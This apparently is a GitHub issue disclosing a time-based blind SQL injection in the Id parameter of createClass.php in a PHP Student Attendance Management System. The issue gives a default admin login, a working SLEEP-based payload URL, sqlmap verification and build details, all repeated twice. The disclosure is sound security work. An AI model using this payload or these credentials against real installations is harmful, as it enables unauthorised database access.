You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
SQL injection vulnerability in Student Attendance Management System。input admin@mail.com / Password@123 Log in to the background. Then modify the information in createClass Php, the ID is assigned to the variable $ID, and then inserted into the database for query, and the query information is returned, causing a SQL injection vulnerability
2.sql injectionPOC:
http://127.0.0.1/Admin/createClass.php?action=edit&Id=2' AND (SELECT 5892 FROM (SELECT(SLEEP(5)))cbkc) AND 'Popu'='Popu---
Use sqlmap to verify
Manual verification
SLEEP(5)
SLEEP(8)
The text was updated successfully, but these errors were encountered:
Build environment: Aapche2.4.39; MySQL5.7.26; PHP7.3.4
SQL injection vulnerability in Student Attendance Management System。input admin@mail.com / Password@123 Log in to the background. Then modify the information in createClass Php, the ID is assigned to the variable $ID, and then inserted into the database for query, and the query information is returned, causing a SQL injection vulnerability
2.sql injectionPOC:
http://127.0.0.1/Admin/createClass.php?action=edit&Id=2' AND (SELECT 5892 FROM (SELECT(SLEEP(5)))cbkc) AND 'Popu'='Popu---
The text was updated successfully, but these errors were encountered: